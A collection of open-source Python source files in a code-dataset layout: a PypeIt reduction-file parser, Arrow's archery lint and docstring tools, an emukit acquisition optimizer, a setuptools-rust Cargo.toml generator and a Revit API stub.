kwargs['detector'] = get_parset_list(cfg, 'detector', DetectorPar)
Args:
cfg (:class:`ConfigObj`, :obj:`dict`):
The top-level configuration that defines a list of
sub-ParSets.
pk (str):
The root of the keywords used to set a list of sub-ParSets.
parsetclass (:class:`pypeit.par.parset.ParSet`):
The class used to construct each element in the list of
parameter subsets. The class **must** have a `from_dict`
method that instantiates the
:class:`pypeit.par.parset.ParSet` based on the provide
subsection/subdict from cfg.
Returns:
list: A list of instances of `parsetclass` parsed from the
provided configuration data.
Raises:
ValueError:
Raised if the indices of the subsections are not sequential
and 1-indexed.
"""
# Get the full list of keys
k = cfg.keys()
# Iterate through the list of keys to find the appropriate sub
# parameter sets and their order.
par = []
order = []
for _k in k:
if _k == pk and cfg[_k] is None:
continue
if pk in _k:
try:
# Get the order for this subgroup (e.g., 2 for
# 'detector2'
order += [ int(_k.replace(pk,'')) ]
# And instantiate the parameter set
par += [ parsetclass.from_dict(cfg[_k]) ]
except:
continue
if len(par) > 0:
# Make sure the instances are correctly sorted and sequential
srt = np.argsort(order)
if np.any(np.array(order)[srt]-1 != np.arange(order[srt[-1]])):
raise ValueError('Parameter set series must be sequential and 1-indexed.')
# Return the sorted instances
return [par[i] for i in srt]
# No such subsets were defined, so return a null result
return None
def parset_to_dict(par):
"""
Convert the provided parset into a dictionary.
Args:
par (ParSet):
Returns:
dict: Converted ParSet
"""
try:
d = dict(ConfigObj(par.to_config(section_name='tmp'))['tmp'])
except:
d = dict(ConfigObj(par.to_config()))
return recursive_dict_evaluate(d)
#-----------------------------------------------------------------------
# Functions for parsing the input pypeit file
# TODO: Should these go into a different module? PypitSetup?
#-----------------------------------------------------------------------
def _read_pypeit_file_lines(ifile):
"""
General parser for a pypeit file.
- Checks that the file exists.
- Reads all the lines in the file
- Removes comments, empty lines, and replaces special characters.
Applies to settings, setup, and user-level reduction files.
Args:
ifile (str): Name of the file to parse.
Returns:
:obj:`numpy.ndarray`: Returns a list of the valid lines in the
files.
"""
# Check the files
if not os.path.isfile(ifile):
msgs.error('The filename does not exist -' + msgs.newline() + ifile)
# Read the input lines and replace special characters
with open(ifile, 'r') as f:
lines = np.array([l.replace('\t', ' ').replace('\n', ' ').strip() \
for l in f.readlines()])
# Remove empty or fully commented lines
lines = lines[np.array([ len(l) > 0 and l[0] != '#' for l in lines ])]
# Remove appended comments and return
return np.array([ l.split('#')[0] for l in lines ])
def _find_pypeit_block(lines, group):
"""
Find the PypeIt group block
Args:
lines (:obj:`list`):
List of file lines
group (:obj:`str`):
Name of group to parse
Returns:
int, int: Starting,ending line of the block; -1 if not present
"""
start = -1
end = -1
for i, l in enumerate(lines):
entries = l.split()
if start < 0 and entries[0] == group and entries[1] == 'read':
start = i+1
continue
if entries[0] == group and entries[1] == 'end':
end = i
continue
if start >= 0 and end >= 0:
break
return start, end
def _parse_data_file_name(inp, current_path):
"""
Expand the data file name as necessary and
then search for all data files
Args:
inp (str): Path
current_path (str or None):
Returns:
list: Glob list of files in the generated a path
"""
out = os.path.expanduser(inp) if inp[0] == '~' else inp
if current_path is not None:
out = os.path.join(current_path, out)
return glob.glob(out)
def _read_data_file_names(lines, file_check=True):
"""
Read the raw data file format
Args:
lines (list):
file_check (bool, optional):
Returns:
list: List of data file names
"""
# Pass through all the lines and:
# - Determine if a path is set
# - Gather the files to skip, can include wildcards
# - Gather the files to read, can include wildcards
current_path = None
skip_inp = []
read_inp = []
for l in lines:
_l = l.split(' ')
if _l[0] == 'skip':
space_ind = l.index(" ")
path = l[space_ind + 1:]
skip_inp += _parse_data_file_name(path, current_path)
continue
if _l[0] == 'path':
space_ind = l.index(" ")
current_path = l[space_ind + 1:]
continue
read_inp += _parse_data_file_name(l, current_path)
# Remove any repeated lines
if len(skip_inp) > 0 and len(skip_inp) != len(set(skip_inp)):
msgs.warn('There are duplicated files to skip.')
skip_inp = list(set(skip_inp))
if len(read_inp) > 0 and len(read_inp) != len(set(read_inp)):
msgs.warn('There are duplicated files to read.')
read_inp = list(set(read_inp))
# Remove any files to skip
for _skip in skip_inp:
if _skip in read_inp:
read_inp.remove(_skip)
# Check that the files exist
if file_check:
for f in read_inp:
if not os.path.isfile(f):
raise FileNotFoundError('{0} does not exist!'.format(f))
return read_inp
def _determine_data_format(lines):
"""
Determine the format of the data block in the .pypeit file.
The test used in this function is pretty basic. A table format is
assumed if the first character in *any* line is `|`.
Args:
lines (:obj:`list`):
The list of lines read from the data block of the pypeit
file.
Returns:
str: The syntax of the data files to read::
'raw': A (list of) file roots to be read or found using
`glob`.
'table': ASCII output of an astropy.table.Table
"""
for l in lines:
if l[0] == '|':
return 'table'
return 'raw'
def _read_data_file_table(lines, file_check=True):
"""
Read the file table format.
Args:
lines (:obj:`list`):
List of lines *within the data* block read from the pypeit
file.
file_check (:obj:`bool`, optional):
Check if the specified data files exist.
Returns:
list, dict, Table: Returns the list of data file names, a
dictionary with the frame types of each file where the key of
the dictionary is the file name, and a Table with the data
provided in the pypeit file. Note that the files listed in the
first object contain the full path, whereas the file names in
the frame type dictionary and the data table do not include the
full path to the file.
Raise:
PypeItError:
Raised if `file_check=True` and any of the specified files
to not exist, or if the table does not have a 'filename' or
'frametype' column.
"""
# Allow for multiple paths
paths = []
for l in lines:
space_ind = l.index(" ")
if l[:space_ind].strip() != 'path':
break
paths += [ l[space_ind+1:] ]
npaths = len(paths)
header = [ l.strip() for l in lines[npaths].split('|') ][1:-1]
# Minimum columns required
if 'filename' not in header:
msgs.error('Table format failure: No \'filename\' column.')
if 'frametype' not in header:
msgs.error('Table format failure: No \'frametype\' column.')
# Build the table
nfiles = len(lines) - npaths - 1
tbl = np.empty((nfiles, len(header)), dtype=object)
for i in range(nfiles):
row = np.array([ l.strip() for l in lines[i+npaths+1].split('|') ])[1:-1]
if len(row) != tbl.shape[1]:
raise ValueError('Data and header lines have mismatched columns!')
tbl[i,:] = row
data = {}
for i,key in enumerate(header):
data[key] = tbl[:,i]
tbl = Table(data)
# Build full paths to file and set frame types
frametype = {}
data_files = []
for i in range(nfiles):
frametype[tbl['filename'][i]] = tbl['frametype'][i]
for p in paths:
filename = os.path.join(p, tbl['filename'][i])
if os.path.isfile(filename):
break
data_files.append(filename)
if not os.path.isfile(filename) and file_check:
msgs.error('File does not exist: {0}'.format(filename))
return data_files, frametype, tbl
def _parse_setup_lines(lines):
"""Return a list of the setup names"""
setups = []
for l in lines:
if 'Setup' in l:
tsetup = l.split()[1].strip()
# Remove any lingering colon
if tsetup[-1] == ':':
setup = tsetup[:-1]
else:
setup = tsetup
setups.append(setup)
#
return setups
def parse_pypeit_file(ifile, file_check=True, runtime=False):
"""
Parse the user-provided .pypeit reduction file.
Args:
ifile (:obj:`str`):
Name of pypeit file
file_check (:obj:`bool`, optional):
Check that the files in the pypeit configuration data file
exist, and fault if they do not.
runtime (:obj:`bool`, optional):
Perform additional checks if called to run PypeIt
Returns:
5-element tuple containing
- list: List of configuration lines,
- list: List of datafiles to read,
- list: List of frametypes for each file
- :obj:`astropy.table.Table`: Table of user supplied info on data files
- list: List of setup lines.
"""
# Read in the pypeit reduction file
msgs.info('Loading the reduction file')
lines = _read_pypeit_file_lines(ifile)
# Used to select the configuration lines: Anything that isn't part
# of the data or setup blocks is assumed to be part of the
# configuration
is_config = np.ones(len(lines), dtype=bool)
# Parse data block
s, e = _find_pypeit_block(lines, 'data')
if s >= 0 and e < 0:
msgs.error("Missing 'data end' in {0}".format(ifile))
if s < 0:
msgs.error("You haven't specified any data!")
data_format = _determine_data_format(lines[s:e])
if data_format == 'raw':
frametype = None
usrtbl = None
data_files = _read_data_file_names(lines[s:e], file_check=file_check)
elif data_format == 'table':
data_files, frametype, usrtbl = _read_data_file_table(lines[s:e], file_check=file_check)
is_config[s-1:e+1] = False
if len(data_files) == 0 and file_check:
msgs.error('There are no raw data frames' + msgs.newline() +
'Perhaps the path to the data is incorrect?')
else:
msgs.info('Found {0:d} raw data frames'.format(len(data_files)))
# Parse the setup block
s, e = _find_pypeit_block(lines, 'setup')
if s >= 0 and e < 0:
msgs.error("Missing 'setup end' in {0}".format(ifile))
if s < 0:
setups = []
else:
setups = _parse_setup_lines(lines[s:e])
is_config[s-1:e+1] = False
# TODO: This should be moved to the PypeIt class
# Running PypeIt?
if runtime:
for key in ['filename', 'frametype']:
if key not in usrtbl.keys():
msgs.error("Add {:s} to your PypeIt file before using run_pypeit".format(key))
# Setup
if len(setups) != 1:
msgs.error("Add setup info to your PypeIt file in the setup block!")
msgs.info('Input file loaded successfully')
return list(lines[is_config]), data_files, frametype, usrtbl, setups
def pypeit_config_lines(ifile):
"""
Return the config lines from a PypeIt file.
Args:
ifile (str): Name of PypeIt file
Returns:
list: List of configuration lines; will be used for ConfigObj
"""
lines = _read_pypeit_file_lines(ifile)
# Find the config lines, assumed to be everything *except* the lines
# in the data and setup blocks
is_config = np.ones(len(lines), dtype=bool)
s, e = _find_pypeit_block(lines, 'data')
if s >= 0 and e < 0:
msgs.error("Missing 'data end' in {0}".format(ifile))
if not s < 0:
is_config[s-1:e+1] = False
s, e = _find_pypeit_block(lines, 'setup')
if s >= 0 and e < 0:
msgs.error("Missing 'setup end' in {0}".format(ifile))
if not s < 0:
is_config[s-1:e+1] = False
return list(lines[is_config])
def make_pypeit_file(pypeit_file, spectrograph, data_files, cfg_lines=None, setup_mode=False,
setup_lines=None, sorted_files=None, paths=None):
"""
Generate a default PypeIt file
Args:
pypeit_file (str): Name of PYPIT file to be generated
spectrograph (str): Name of spectrograph
data_files (list): List of data files -- essentially Deprecated
cfg_lines (list, optional): List of configuration lines for parameters
setup_mode (bool, optional): If True, 0 out required files for everything except Arc
setup_lines (list, optional):
sorted_files (list, optional):
paths (list, optional): List of paths for slurping data files
"""
# Error checking
if not isinstance(data_files, list):
raise IOError("data_files needs to be a list")
# Defaults
if cfg_lines is None:
_cfg_lines = ['[rdx]']
_cfg_lines += [' spectrograph = {0}'.format(spectrograph)]
else:
_cfg_lines = list(cfg_lines)
# TODO: Bring back checks for the appropriate number of calibration
# frames?
# TODO: Clean up and check validity of _cfg_lines by reading it into
# a ConfigObj?
# Here we go
with open(pypeit_file, 'w') as f:
f.write('# Auto-generated PypeIt file\n')
f.write('# {0}\n'.format(time.strftime("%a %d %b %Y %H:%M:%S",time.localtime())))
f.write("\n")
f.write("# User-defined execution parameters\n")
f.write('\n'.join(_cfg_lines))
f.write('\n')
f.write('\n')
if setup_lines is not None:
f.write("# Setup\n")
f.write("setup read\n")
for sline in setup_lines:
f.write(' '+sline+'\n')
f.write("setup end\n")
f.write("\n")
# Data
f.write("# Read in the data\n")
f.write("data read\n")
# Old school
for datafile in data_files:
f.write(' '+datafile+'\n')
# paths and Setupfiles
if paths is not None:
for path in paths:
f.write(' path '+path+'\n')
if sorted_files is not None:
f.write('\n'.join(sorted_files))
f.write('\n')
f.write("data end\n")
f.write("\n")
msgs.info('PypeIt file written to: {0}'.format(pypeit_file))
| 31.523732
| 96
| 0.582992
|
6ffa90144304545bb9e311a852e9838fc854c08d
| 7,754
|
py
|
Python
|
dev/archery/archery/lang/python.py
|
timkpaine/arrow
|
a96297e65e17e728e4321cdecc7ace146e1363fb
|
[
"CC-BY-3.0",
"Apache-2.0",
"CC0-1.0",
"MIT"
] | 9,734
|
2016-02-17T13:22:12.000Z
|
2022-03-31T09:35:00.000Z
|
dev/archery/archery/lang/python.py
|
timkpaine/arrow
|
a96297e65e17e728e4321cdecc7ace146e1363fb
|
[
"CC-BY-3.0",
"Apache-2.0",
"CC0-1.0",
"MIT"
] | 11,470
|
2016-02-19T15:30:28.000Z
|
2022-03-31T23:27:21.000Z
|
dev/archery/archery/lang/python.py
|
timkpaine/arrow
|
a96297e65e17e728e4321cdecc7ace146e1363fb
|
[
"CC-BY-3.0",
"Apache-2.0",
"CC0-1.0",
"MIT"
] | 2,637
|
2016-02-17T10:56:29.000Z
|
2022-03-31T08:20:13.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import inspect
import tokenize
from contextlib import contextmanager
try:
from numpydoc.validate import Docstring, validate
except ImportError:
have_numpydoc = False
else:
have_numpydoc = True
from ..utils.logger import logger
from ..utils.command import Command, capture_stdout, default_bin
class Flake8(Command):
def __init__(self, flake8_bin=None):
self.bin = default_bin(flake8_bin, "flake8")
class Autopep8(Command):
def __init__(self, autopep8_bin=None):
self.bin = default_bin(autopep8_bin, "autopep8")
@capture_stdout()
def run_captured(self, *args, **kwargs):
return self.run(*args, **kwargs)
def _tokenize_signature(s):
lines = s.encode('ascii').splitlines()
generator = iter(lines).__next__
return tokenize.tokenize(generator)
def _convert_typehint(tokens):
names = []
opening_bracket_reached = False
for token in tokens:
# omit the tokens before the opening bracket
if not opening_bracket_reached:
if token.string == '(':
opening_bracket_reached = True
else:
continue
if token.type == 1: # type 1 means NAME token
names.append(token)
else:
if len(names) == 1:
yield (names[0].type, names[0].string)
elif len(names) == 2:
# two "NAME" tokens follow each other which means a cython
# typehint like `bool argument`, so remove the typehint
# note that we could convert it to python typehints, but hints
# are not supported by _signature_fromstr
yield (names[1].type, names[1].string)
elif len(names) > 2:
raise ValueError('More than two NAME tokens follow each other')
names = []
yield (token.type, token.string)
def inspect_signature(obj):
"""
Custom signature inspection primarily for cython generated callables.
Cython puts the signatures to the first line of the docstrings, which we
can reuse to parse the python signature from, but some gymnastics are
required, like removing the cython typehints.
It converts the cython signature:
array(obj, type=None, mask=None, size=None, from_pandas=None,
bool safe=True, MemoryPool memory_pool=None)
To:
<Signature (obj, type=None, mask=None, size=None, from_pandas=None,
safe=True, memory_pool=None)>
"""
cython_signature = obj.__doc__.splitlines()[0]
cython_tokens = _tokenize_signature(cython_signature)
python_tokens = _convert_typehint(cython_tokens)
python_signature = tokenize.untokenize(python_tokens)
return inspect._signature_fromstr(inspect.Signature, obj, python_signature)
class NumpyDoc:
def __init__(self, symbols=None):
if not have_numpydoc:
raise RuntimeError(
'Numpydoc is not available, install with command: '
'pip install numpydoc==1.1.0'
)
self.symbols = set(symbols or {'pyarrow'})
def traverse(self, fn, obj, from_package):
"""Apply a function on publicly exposed API components.
Recursively iterates over the members of the passed object. It omits
any '_' prefixed and thirdparty (non pyarrow) symbols.
Parameters
----------
obj : Any
from_package : string, default 'pyarrow'
Predicate to only consider objects from this package.
"""
todo = [obj]
seen = set()
while todo:
obj = todo.pop()
if obj in seen:
continue
else:
seen.add(obj)
fn(obj)
for name in dir(obj):
if name.startswith('_'):
continue
member = getattr(obj, name)
module = getattr(member, '__module__', None)
if not (module and module.startswith(from_package)):
continue
todo.append(member)
@contextmanager
def _apply_patches(self):
"""
Patch Docstring class to bypass loading already loaded python objects.
"""
orig_load_obj = Docstring._load_obj
orig_signature = inspect.signature
@staticmethod
def _load_obj(obj):
# By default it expects a qualname and import the object, but we
# have already loaded object after the API traversal.
if isinstance(obj, str):
return orig_load_obj(obj)
else:
return obj
def signature(obj):
# inspect.signature tries to parse __text_signature__ if other
# properties like __signature__ doesn't exists, but cython
# doesn't set that property despite that embedsignature cython
# directive is set. The only way to inspect a cython compiled
# callable's signature to parse it from __doc__ while
# embedsignature directive is set during the build phase.
# So path inspect.signature function to attempt to parse the first
# line of callable.__doc__ as a signature.
try:
return orig_signature(obj)
except Exception as orig_error:
try:
return inspect_signature(obj)
except Exception:
raise orig_error
try:
Docstring._load_obj = _load_obj
inspect.signature = signature
yield
finally:
Docstring._load_obj = orig_load_obj
inspect.signature = orig_signature
def validate(self, from_package='', allow_rules=None,
disallow_rules=None):
results = []
def callback(obj):
try:
result = validate(obj)
except OSError as e:
symbol = f"{obj.__module__}.{obj.__name__}"
logger.warning(f"Unable to validate `{symbol}` due to `{e}`")
return
errors = []
for errcode, errmsg in result.get('errors', []):
if allow_rules and errcode not in allow_rules:
continue
if disallow_rules and errcode in disallow_rules:
continue
errors.append((errcode, errmsg))
if len(errors):
result['errors'] = errors
results.append((obj, result))
with self._apply_patches():
for symbol in self.symbols:
try:
obj = Docstring._load_obj(symbol)
except (ImportError, AttributeError):
print('{} is not available for import'.format(symbol))
else:
self.traverse(callback, obj, from_package=from_package)
return results
| 34.616071
| 79
| 0.60472
|
c7220b1cb4e8e24a248bae47f20de784f1573890
| 2,802
|
py
|
Python
|
emukit/core/optimization/gradient_acquisition_optimizer.py
|
aaronkl/emukit
|
ccd80811a1b8e11ece97dceb2f8c7b92a7a4f236
|
[
"Apache-2.0"
] | 6
|
2019-06-02T21:23:27.000Z
|
2020-02-17T09:46:30.000Z
|
emukit/core/optimization/gradient_acquisition_optimizer.py
|
aaronkl/emukit
|
ccd80811a1b8e11ece97dceb2f8c7b92a7a4f236
|
[
"Apache-2.0"
] | 4
|
2019-05-17T13:30:21.000Z
|
2019-06-21T13:49:19.000Z
|
emukit/core/optimization/gradient_acquisition_optimizer.py
|
aaronkl/emukit
|
ccd80811a1b8e11ece97dceb2f8c7b92a7a4f236
|
[
"Apache-2.0"
] | null | null | null |
from typing import Dict, Optional, Tuple
from GPyOpt.optimization import AcquisitionOptimizer
import numpy as np
from .acquisition_optimizer import AcquisitionOptimizerBase
from .context_manager import ContextManager
from .. import ParameterSpace
from ..acquisition import Acquisition
import logging
_log = logging.getLogger(__name__)
class GradientAcquisitionOptimizer(AcquisitionOptimizerBase):
""" Optimizes the acquisition function using a quasi-Newton method (L-BFGS).
Can be used for continuous acquisition functions.
"""
def __init__(self, space: ParameterSpace, **kwargs) -> None:
"""
:param space: The parameter space spanning the search problem.
:param kwargs: Additional keyword arguments supported
by GPyOpt.optimization.AcquisitionOptimizer.
Note: only the 'lbfgs' optimizer is allowed.
"""
super().__init__(space)
if 'optimizer' in kwargs and kwargs['optimizer'] != 'lbfgs':
raise ValueError("GradientAcquisitionOptimizer only supports"
"GPyOpt\'s lbfgs optimizer, got {}".format(kwargs['optimizer']))
self.gpyopt_acquisition_optimizer = AcquisitionOptimizer(self.gpyopt_space, **kwargs)
def _optimize(self, acquisition: Acquisition, context_manager: ContextManager)\
-> Tuple[np.ndarray, np.ndarray]:
"""
Implementation of abstract method.
Taking into account gradients if acquisition supports them.
See AcquisitionOptimizerBase._optimizer for parameter descriptions.
See class docstring for implementation details.
"""
self.gpyopt_acquisition_optimizer.context_manager = context_manager._gpyopt_context_manager
# Take negative of acquisition function because they are to be maximised and the optimizers minimise
f = lambda x: -acquisition.evaluate(x)
# Context validation
if len(context_manager.contextfree_space.parameters) == 0:
_log.warning("All parameters are fixed through context")
x = np.array(context_manager._gpyopt_context_manager.context_value)[None, :]
return x, f(x)
def f_df(x):
f_value, df_value = acquisition.evaluate_with_gradients(x)
return -f_value, -df_value
if acquisition.has_gradients:
_log.info("Starting gradient-based optimization of acquisition function {}".format(type(acquisition)))
x, f_min = self.gpyopt_acquisition_optimizer.optimize(f, None, f_df)
else:
_log.info("Starting gradient-free optimization of acquisition function {}".format(type(acquisition)))
x, f_min = self.gpyopt_acquisition_optimizer.optimize(f, None, None)
return x, -f_min
| 43.78125
| 114
| 0.693433
|
7bdb81aadefec588d92f9e9d4b10bdc57ee6a2cb
| 8,935
|
py
|
Python
|
setuptools_rust/tomlgen.py
|
mtreinish/setuptools-rust
|
75fa9ab31351071a490b8d9c18826adf05ceb047
|
[
"MIT"
] | null | null | null |
setuptools_rust/tomlgen.py
|
mtreinish/setuptools-rust
|
75fa9ab31351071a490b8d9c18826adf05ceb047
|
[
"MIT"
] | null | null | null |
setuptools_rust/tomlgen.py
|
mtreinish/setuptools-rust
|
75fa9ab31351071a490b8d9c18826adf05ceb047
|
[
"MIT"
] | null | null | null |
# coding: utf-8
import glob
import os
import string
try:
import configparser
except ImportError:
import ConfigParser as configparser
import setuptools
from distutils import log
from distutils.command.build import build
from .extension import RustExtension
__all__ = ["tomlgen"]
class tomlgen_rust(setuptools.Command):
description = "Generate `Cargo.toml` for rust extensions"
user_options = [
(str("force"), str("f"), str("overwrite existing files if any")),
(
str("create-workspace"),
str("w"),
str("create a workspace file at the root of the project"),
),
(
str("no-config"),
str("C"),
str("do not create a `.cargo/config` file when generating a workspace"),
),
]
boolean_options = [str("create_workspace"), str("force")]
def initialize_options(self):
self.dependencies = None
self.authors = None
self.create_workspace = None
self.no_config = None
self.force = None
# use the build command to find build directories
self.build = build(self.distribution)
# parse config files
self.cfg = configparser.ConfigParser()
self.cfg.read(self.distribution.find_config_files())
def finalize_options(self):
# Finalize previous commands
self.distribution.finalize_options()
self.build.ensure_finalized()
# Shortcuts
self.extensions = self.distribution.rust_extensions
self.workspace = os.path.abspath(
os.path.dirname(self.distribution.script_name) or "."
)
# Build list of authors
if self.authors is not None:
sep = "\n" if "\n" in self.authors.strip() else ","
self.authors = [author.strip() for author in self.authors.split(sep)]
else:
self.authors = [
"{} <{}>".format(
self.distribution.get_author(),
self.distribution.get_author_email().strip("\"'"),
)
]
def run(self):
import toml
# Create a `Cargo.toml` for each extension
for ext in self.extensions:
if not os.path.exists(ext.path) or self.force:
log.info("creating 'Cargo.toml' for '%s'", ext.name)
with open(ext.path, "w") as manifest:
toml.dump(self.build_cargo_toml(ext), manifest)
else:
log.warn("skipping 'Cargo.toml' for '%s' -- already exists", ext.name)
# Create a `Cargo.toml` for the project workspace
if self.create_workspace and self.extensions:
toml_path = os.path.join(self.workspace, "Cargo.toml")
if not os.path.exists(toml_path) or self.force:
log.info("creating 'Cargo.toml' for workspace")
with open(toml_path, "w") as manifest:
toml.dump(self.build_workspace_toml(), manifest)
else:
log.warn("skipping 'Cargo.toml' for workspace -- already exists")
# Create a `.cargo/config` file
if self.create_workspace and self.extensions and not self.no_config:
dist = self.distribution
targetdir = os.path.join(self.build.build_temp, dist.get_name())
cfgdir = os.path.abspath(
os.path.join(os.getcwd(), dist.script_name, "..", ".cargo")
)
if not os.path.exists(os.path.join(cfgdir, "config")) or self.force:
if not os.path.exists(cfgdir):
os.makedirs(cfgdir)
with open(os.path.join(cfgdir, "config"), "w") as config:
log.info("creating '.cargo/config' for workspace")
toml.dump({
'build': {
'target-dir': os.path.relpath(targetdir)
},
}, config)
else:
log.warn("skipping '.cargo/config' -- already exists")
def build_cargo_toml(self, ext):
toml = {}
# The directory where the extension's manifest is located
tomldir = os.path.dirname(ext.path)
# If the RustExtension was not created by `find_rust_extensions`
# the `lib.rs` file is expected to be located near `Cargo.toml`
if not hasattr(ext, "libfile"):
ext.libfile = ext.path.replace("Cargo.toml", "lib.rs")
# Create a small package section
toml["package"] = {
"name": ext.name.replace('.', '-'),
"version": self.distribution.get_version(),
"authors": self.authors,
"publish": False,
"edition": "2018"
}
# Add the relative path to the workspace if any
if self.create_workspace:
toml["package"]["workspace"] = os.path.relpath(self.workspace, tomldir)
# Create a small lib section
toml["lib"] = {
"crate-type": ["cdylib"],
"name": _slugify(ext.name),
"path": os.path.relpath(ext.libfile, tomldir)
}
# Find dependencies within the `setup.cfg` file of the project
toml["dependencies"] = {}
for dep, options in self.iter_dependencies(ext):
toml["dependencies"][dep] = options
return toml
def build_workspace_toml(self):
# Find all members of the workspace
members = [
os.path.dirname(os.path.relpath(ext.path)) for ext in self.extensions
]
return {
"workspace": {
"members": members
}
}
def iter_dependencies(self, ext=None):
import toml
command = self.get_command_name()
# global dependencies
sections = ["{}.dependencies".format(command)]
# extension-specific dependencies
if ext is not None:
sections.append("{}.dependencies.{}".format(command, ext.name))
for section in sections:
if self.cfg.has_section(section):
for dep, options in self.cfg.items(section):
yield dep, toml.loads(f"{dep} = {options}")[dep]
def _slugify(name):
allowed = set(string.ascii_letters + string.digits + "_")
slug = [char if char in allowed else "_" for char in name]
return "".join(slug)
def find_rust_extensions(*directories, **kwargs):
"""Attempt to find Rust extensions in given directories.
This function will recurse through the directories in the given
directories, to find a name whose name is ``libfile``. When such
a file is found, an extension is created, expecting the cargo
manifest file (``Cargo.toml``) to be next to that file. The
extension destination will be deduced from the name of the
directory where that ``libfile`` is contained.
Arguments:
directories (list, *optional*): a list of directories to walk
through recursively to find extensions. If none are given,
then the current directory will be used instead.
Keyword Arguments:
libfile (str): the name of the file to look for when searching
for Rust extensions. Defaults to ``lib.rs``, but might be
changed to allow defining more *Pythonic* filenames
(like ``__init__.rs``)!
Note:
All other keyword arguments will be directly passed to the
`RustExtension` instance created when an extension is found.
One may be interested in passing ``bindings`` and ``strip``
options::
>>> import setuptools_rust as rust
>>> rust.find_rust_extensions(binding=rust.Binding.PyO3)
Example:
Consider the following project::
lib/
└ mylib/
└ rustext/
├ lib.rs
├ ...
└ Cargo.toml
setup.py
There is only one extension that can be found in the ``lib``
module::
>>> import setuptools_rust as rust
>>> for ext in rust.find_rust_extensions("lib"):
... print(ext.name, "=>", ext.path)
lib.mylib.rustext => lib/mylib/rustext/Cargo.toml
"""
# Get the file used to mark a Rust extension
libfile = kwargs.get("libfile", "lib.rs")
# Get the directories to explore
directories = directories or [os.getcwd()]
extensions = []
for directory in directories:
for base, dirs, files in os.walk(directory):
if libfile in files:
dotpath = os.path.relpath(base).replace(os.path.sep, ".")
tomlpath = os.path.join(base, "Cargo.toml")
ext = RustExtension(dotpath, tomlpath, **kwargs)
ext.libfile = os.path.join(base, libfile)
extensions.append(ext)
return extensions
| 33.339552
| 86
| 0.573027
|
981dd83788630c5a1d578cafcb636622776c8a08
| 4,630
|
py
|
Python
|
release/stubs.min/Autodesk/Revit/DB/__init___parts/ElementTransformUtils.py
|
YKato521/ironpython-stubs
|
b1f7c580de48528490b3ee5791b04898be95a9ae
|
[
"MIT"
] | null | null | null |
release/stubs.min/Autodesk/Revit/DB/__init___parts/ElementTransformUtils.py
|
YKato521/ironpython-stubs
|
b1f7c580de48528490b3ee5791b04898be95a9ae
|
[
"MIT"
] | null | null | null |
release/stubs.min/Autodesk/Revit/DB/__init___parts/ElementTransformUtils.py
|
YKato521/ironpython-stubs
|
b1f7c580de48528490b3ee5791b04898be95a9ae
|
[
"MIT"
] | null | null | null |
class ElementTransformUtils(object):
""" A collection of utilities allowing transformation of elements (e.g. move,rotate,mirror and copy). """
@staticmethod
def CanMirrorElement(ADoc, elemId):
"""
CanMirrorElement(ADoc: Document,elemId: ElementId) -> bool
Determines whether element can be mirrored.
ADoc: The document where the element reside.
elemId: The element identified by id.
Returns: True if the element can be mirrored.
"""
pass
@staticmethod
def CanMirrorElements(ADoc, elemIds):
""" CanMirrorElements(ADoc: Document,elemIds: ICollection[ElementId]) -> bool """
pass
@staticmethod
def CopyElement(document, elementToCopy, translation):
"""
CopyElement(document: Document,elementToCopy: ElementId,translation: XYZ) -> ICollection[ElementId]
Copies an element and places the copy at a location indicated by a given
transformation.
document: The document that owns the element.
elementToCopy: The id of the element to copy.
translation: The translation vector for the new element.
Returns: The ids of the newly created copied elements. More than one element may be
created due to dependencies.
"""
pass
@staticmethod
def CopyElements(*__args):
"""
CopyElements(document: Document,elementsToCopy: ICollection[ElementId],translation: XYZ) -> ICollection[ElementId]
CopyElements(sourceDocument: Document,elementsToCopy: ICollection[ElementId],destinationDocument: Document,transform: Transform,options: CopyPasteOptions) -> ICollection[ElementId]
CopyElements(sourceView: View,elementsToCopy: ICollection[ElementId],destinationView: View,additionalTransform: Transform,options: CopyPasteOptions) -> ICollection[ElementId]
"""
pass
@staticmethod
def GetTransformFromViewToView(sourceView, destinationView):
"""
GetTransformFromViewToView(sourceView: View,destinationView: View) -> Transform
Returns a transformation that is applied to elements when copying from one view
to another view.
sourceView: The source view
destinationView: The destination view
Returns: The transformation from source view to destination view.
"""
pass
@staticmethod
def MirrorElement(document, elementToMirror, plane):
"""
MirrorElement(document: Document,elementToMirror: ElementId,plane: Plane)
Creates a mirrored copy of an element about a given plane.
document: The document that owns the element.
elementToMirror: The element to mirror.
plane: The mirror plane.
"""
pass
@staticmethod
def MirrorElements(document, elementsToMirror, plane, mirrorCopies):
""" MirrorElements(document: Document,elementsToMirror: ICollection[ElementId],plane: Plane,mirrorCopies: bool) -> IList[ElementId] """
pass
@staticmethod
def MoveElement(document, elementToMove, translation):
"""
MoveElement(document: Document,elementToMove: ElementId,translation: XYZ)
Moves one element by a given transformation.
document: The document that owns the elements.
elementToMove: The id of the element to move.
translation: The translation vector for the elements.
"""
pass
@staticmethod
def MoveElements(document, elementsToMove, translation):
""" MoveElements(document: Document,elementsToMove: ICollection[ElementId],translation: XYZ) """
pass
@staticmethod
def RotateElement(document, elementToRotate, axis, angle):
"""
RotateElement(document: Document,elementToRotate: ElementId,axis: Line,angle: float)
Rotates an element about the given axis and angle.
document: The document that owns the elements.
elementToRotate: The element to rotate.
axis: The axis of rotation.
angle: The angle of rotation in radians.
"""
pass
@staticmethod
def RotateElements(document, elementsToRotate, axis, angle):
""" RotateElements(document: Document,elementsToRotate: ICollection[ElementId],axis: Line,angle: float) """
pass
__all__ = [
"CanMirrorElement",
"CanMirrorElements",
"CopyElement",
"CopyElements",
"GetTransformFromViewToView",
"MirrorElement",
"MirrorElements",
"MoveElement",
"MoveElements",
"RotateElement",
"RotateElements",
]
| 27.235294
| 183
| 0.674298
|
612f08c8586d9a658409baaf37c70d38e9776028
| 7,530
|
py
|
Python
|
scripts/psl2table.py
|
861934367/cgat
|
77fdc2f819320110ed56b5b61968468f73dfc5cb
|
[
"BSD-2-Clause",
"BSD-3-Clause"
] | null | null | null |
scripts/psl2table.py
|
861934367/cgat
|
